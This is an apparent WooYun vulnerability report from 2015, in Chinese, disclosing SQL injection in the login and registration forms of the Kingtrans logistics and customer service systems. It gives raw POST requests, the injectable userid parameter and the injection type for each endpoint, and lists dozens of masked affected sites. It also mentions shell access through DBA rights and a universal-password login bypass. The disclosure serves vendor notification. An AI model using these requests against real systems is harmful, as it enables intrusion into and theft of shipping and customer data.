当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0150979

漏洞标题:Kingtrans物流管理系统&Kingtrans客户服务系统均存在两处通用型DBA权限注入

相关厂商:深圳市易宇通科技有限公司

漏洞作者: 路人甲

提交时间:2015-11-02 09:41

修复时间:2015-12-17 14:48

公开时间:2015-12-17 14:48

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-11-02: 细节已通知厂商并且等待厂商处理中
2015-11-06: 厂商已经确认,细节仅向厂商公开
2015-11-09: 细节向第三方安全合作伙伴开放(绿盟科技唐朝安全巡航
2015-12-31: 细节向核心白帽子及相关领域专家公开
2016-01-10: 细节向普通白帽子公开
2016-01-20: 细节向实习白帽子公开
2015-12-17: 细节向公众公开

简要描述:

可影响大量物流公司信息、包括运往国外的物流信息,DBA权限可直接shell。你懂得~

详细说明:

官方部分案例:

http://**.**.**.**/case/


产品:Kingtrans物流管理系统、Kingtrans客户服务系统
说明:
1、前人似乎提交过类似的事件漏洞,但好像他根本不清楚这是一套通用?
2、Kingtrans物流管理系统和Kingtrans客户服务系统是相互依存、同时存在的。
3、系统分别为K5版(暂时这样叫)和标准版,并且K5版的客户服务系统和标准版的界面风格也不一致。
4、虽然很多是同主域名的不同子域,但从官方给出的案例查找系统和对域名IP反查发现虽然是不同子域的但并非同一物流公司,所以是属于通用。
5、两个不同版的物流管理系统和以及对应的客户服务系统都分别存在两处注入,
6、案例请mask保护。
::在官方的case中:http://**.**.**.**/case/ 找三个站点:

http://**.**.**.**/
http://**.**.**.**/
http://**.**.**.**/


在上面的网站找网站中的“会员登录”处直接点登陆进去客户服务系统
得到三个物流管理系统分别是:

mask 区域 
1.http://**.**.**/  深圳市超时空国际货运代理有限公司_
2.http://**.**.**/ 宁波海曙龙旺达货运代理有限公司_
3.http://**.**.**/ 广州瞬通货运代理有限公司


可以发现 虽然看起来是不同的子域,但是确实不同物流公司的系统;并且IP也不是同一个IP。
SQL注入简要描述:

1、K5版登陆处注入:POST /Logon?action=logon    userid联合查询注入
POST数据:ifcookie=0&driveno=&macaddr=&userid=admin&password=aaa&Submit=%E7%99%BB%E5%BD%95
2、K5版对应的客户服务系统:POST /client/Logon?action=logon   userid报错注入
POST数据:userid=kehu&password=aaaa
3、K5版注册注入存在注入:POST /CUesrRegister?action=register  userid联合查询注入
POST数据:userid=admin&password=111111&password_1=111111&corpid=123&clientname=aaaaa&totalname=bbbbb&regno=cccc&tel=dddd&faxno=&post=&website=&clientaddress=&pickaddr=eeee&contact=&qq=ffff&msn=&mobile=eeee&email=&othertel=&note=&checkname=1&Submit=%E6%B3%A8%E5%86%8C
4、标准版登陆处注入:POST /Logon?action=logon    userid联合查询注入
POST数据:
txtMACAddr=&txtIPAddr=&txtDNSName=&userid=a&password=a
5、标准版对应的客户服务系统注入:POST /client/Logon?action=logon   userid报错注入
POST数据:userid=kehu&password=aaaa
6、标准版的注册处存在注入:POST /data/CUesrRegister?action=register  userid延时注入
POST数据:userid=admin&password=111111&corpshname=111111&corpname=1111&contcter=111111&telphone=11111&mphone=11111&email=11111%**.**.**.**&addr=111&Submit=%B1%A3%B4%E6


案例:【分别列举了K5版、标准版的物流管理、客户服务系统】

mask 区域 
*****管理系统:******
*****ca12234621e3a15e1c938e.jpg*****
1.http://**.**.**/logon.jsp  官方demo_
2.http://**.**.**/logon.jsp_
3.http://**.**.**/logon.jsp_
4.http://**.**.**/logon.jsp_
5.://**.**.**/logon.jsp_
6.http://**.**.**/logon.jsp_
7.://**.**.**/logon.jsp_
8.http://**.**.**/logon.jsp_
9.http://**.**.**/logon.jsp_
10.http://**.**.**/logon.jsp_
11.http://**.**.**/logon.jsp_
12.http://**.**.**/logon.jsp_
13.http://**.**.**/logon.jsp_
14.http://**.**.**/logon.jsp_
15.http://**.**.**/logon.jsp_
16.http://**.**.**/logon.jsp_
17.http://**.**.**/logon.jsp_
18.http://**.**.**/logon.jsp_
19.http://**.**.**/logon.jsp_
20.http://**.**.**/logon.jsp_
21.http://**.**.**/logon.jsp_
22.http://**.**.**/logon.jsp_
23.http://**.**.**/logon.jsp_
**********
**********
**********
*****^^应的客户服务系统^*****
*****72a1b21c9757d3c58f4fc4.jpg*****
24.http://**.**.**/c_index.jsp_
25.http://**.**.**/c_index.jsp_
26.http://**.**.**/c_index.jsp_
27.http://**.**.**/c_index.jsp_
28.http://**.**.**/c_index.jsp_
29.://**.**.**/c_index.jsp_
30.http://**.**.**/c_index.jsp_
31.http://**.**.**/c_index.jsp_
32.http://**.**.**/c_index.jsp_
33.http://**.**.**/c_index.jsp_
34.http://**.**.**/c_index.jsp_
35.http://**.**.**/c_index.jsp_
36.http://**.**.**/c_index.jsp_
37.http://**.**.**/c_index.jsp_
38.http://**.**.**/c_index.jsp_
39.http://**.**.**/c_index.jsp_
40.http://**.**.**/c_index.jsp_
41.http://**.**.**/c_index.jsp_
**********
**********
*****^^管理系统:*****
*****454fc83231935e665a8f91.jpg*****
42.://**.**.**/_
43.://**.**.**/_
44.://**.**.**/_
45.://**.**.**/_
46.://**.**.**/_
47.://**.**.**/_
48.://**.**.**/_
49.://**.**.**/_
******.*******
50.://**.**.**/_
51.http://**.**.**/_
52.http://**.**.**/_
53.http://**.**.**/_
54.http://**.**.**/_
55.http://**.**.**/_
56.http://**.**.**/_
57.http://**.**.**/_
58.http://**.**.**/_
59.http://**.**.**/_
60.http://**.**.**/_
61.http://**.**.**/_
62.http://**.**.**/_
63.http://**.**.**/_
64.http://**.**.**/_
65.http://**.**.**/_
66.http://**.**.**/_
67.http://**.**.**/_
68.http://**.**.**/_
69.http://**.**.**/_
**********
**********
*****所对应的客户服务*****
*****a8752622d299915f25288c.jpg*****
70.://**.**.**/client.jspretry_reason=PASSWORD_
71.://**.**.**/client.jspretry_reason=PASSWORD_
72.://**.**.**/client.jspretry_reason=PASSWORD_
73.http://**.**.**/client.jspretry_reason=PASSWORD_
74.://**.**.**/client.jspretry_reason=PASSWORD_
75.http://**.**.**/client.jspretry_reason=PASSWORD_
76.http://**.**.**/client.jspretry_reason=PASSWORD_
77.http://**.**.**/c_index.jspretry_reason=PASSWORD_
78.http://**.**.**/client.jspretry_reason=PASSWORD_
79.http://**.**.**/client.jspretry_reason=PASSWORD_
80.http://**.**.**/client.jspretry_reason=PASSWORD_
81.http://**.**.**/client.jspretry_reason=PASSWORD_
82.http://**.**.**/client.jspretry_reason=PASSWORD_
83.http://**.**.**/client.jspretry_reason=PASSWORD_
84.http://**.**.**/client.jspretry_reason=PASSWORD_
85.http://**.**.**/client.jspretry_reason=PASSWORD_
86.http://**.**.**/client.jspretry_reason=PASSWORD_
87.http://**.**.**/daili/

漏洞证明:

【免责声明:详细说明与漏洞证明为漏洞报告非利用方式,漏洞将由厂商认领、修复或者提交给国家互联网应急中心进行通知厂商修复,本漏洞仅供证明漏洞存在未获取任何有效机密数据,案例仅供国家互联网应急中心测试使用,其它人不可利用该漏洞进行恶意破坏,否则后果自负,漏洞在厂商确认后均做打码处理】
K5版证明:
SQL注入一:K5版本物流管理系统、以及对应的客户管理系统登陆处都存在注入。

POST /Logon?action=logon HTTP/1.1
Host: **.**.**.**
Proxy-Connection: keep-alive
Content-Length: 77
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://**.**.**.**
User-Agent: *****
Content-Type: application/x-www-form-urlencoded
Referer: http://**.**.**.**/logon.jsp
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8
Cookie: 
ifcookie=0&driveno=&macaddr=&userid=admin&password=aaa&Submit=%E7%99%BB%E5%BD%95
06.jpg




漏洞证明:userid参数存在注入



07.jpg




K5版对应的客户服务管理系统:



09.jpg




POST /client/Logon?action=logon HTTP/1.1
Host: **.**.**.**
Proxy-Connection: keep-alive
Content-Length: 25
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://**.**.**.**
User-Agent: ***
Content-Type: application/x-www-form-urlencoded
Referer: http://**.**.**.**/c_index.jsp
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8
Cookie: 
userid=kehu&password=aaaa
漏洞证明:userid存在注入,虽然是相互依存的系统,但可以看到对应的语句也不一样,前面是联合,这里可以是报错。



08.jpg


SQL注入二:K5版的注册处存在注入

/reg.jsp、或者/CUesrRegister?action=initReg
11.jpg




POST /CUesrRegister?action=register HTTP/1.1
Host: **.**.**.**
Proxy-Connection: keep-alive
Content-Length: 256
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://**.**.**.**
User-Agent: ****
Content-Type: application/x-www-form-urlencoded
Referer: http://**.**.**.**/reg.jsp
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8
Cookie: 
userid=admin&password=111111&password_1=111111&corpid=123&clientname=aaaaa&totalname=bbbbb&regno=cccc&tel=dddd&faxno=&post=&website=&clientaddress=&pickaddr=eeee&contact=&qq=ffff&msn=&mobile=eeee&email=&othertel=&note=&checkname=1&Submit=%E6%B3%A8%E5%86%8C



10.jpg


标准版证明:
SQL注入一:标准版物流管理系统、以及对应的客户管理系统登陆处都存在注入。

12.jpg



 
POST /Logon?action=logon HTTP/1.1
Host: **.**.**.**
Proxy-Connection: keep-alive
Content-Length: 55
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://**.**.**.**
User-Agent: ****
Content-Type: application/x-www-form-urlencoded
Referer: http://**.**.**.**/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8
Cookie: 
txtMACAddr=&txtIPAddr=&txtDNSName=&userid=a'&password=a
漏洞证明:userid存在联合查询



13.jpg




对应的客户服务系统也存在注入:



17.jpg




POST /client/Logon?action=logon HTTP/1.1
Host: ***.**.**.**
Proxy-Connection: keep-alive
Content-Length: 25
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://***.**.**.**
User-Agent: ****
Content-Type: application/x-www-form-urlencoded
Referer: http://***.**.**.**/client.jsp?retry_reason=PASSWORD
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8
Cookie:
userid=kehu&password=aaaa
漏洞证明:userid存在报错注入



16.jpg




另外可以使用万能密码:大量发往国外的物流信息啊



18.jpg


SQL注入二:标准版的注册处存在注入:

标准版注册处存在注入: 
/reg.jsp
14.jpg




POST /data/CUesrRegister?action=register HTTP/1.1
Host: **.**.**.**
Proxy-Connection: keep-alive
Content-Length: 154
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://**.**.**.**
User-Agent: ***
Content-Type: application/x-www-form-urlencoded
Referer: http://***.**.**.**/reg.jsp
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8
userid=admin&password=111111&corpshname=111111&corpname=1111&contcter=111111&telphone=11111&mphone=11111&email=11111%**.**.**.**&addr=111&Submit=%B1%A3%B4%E6
漏洞证明:userid仅支持延迟注入



15.jpg

修复方案:

写的好像很复杂?
简单来说:两个不同版本的不同系统的登陆处和注册处都存在注入。

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:14

确认时间:2015-11-06 17:50

厂商回复:

暂未建立与软件生产厂商单位的直接处置渠道,待认领.

最新状态:

暂无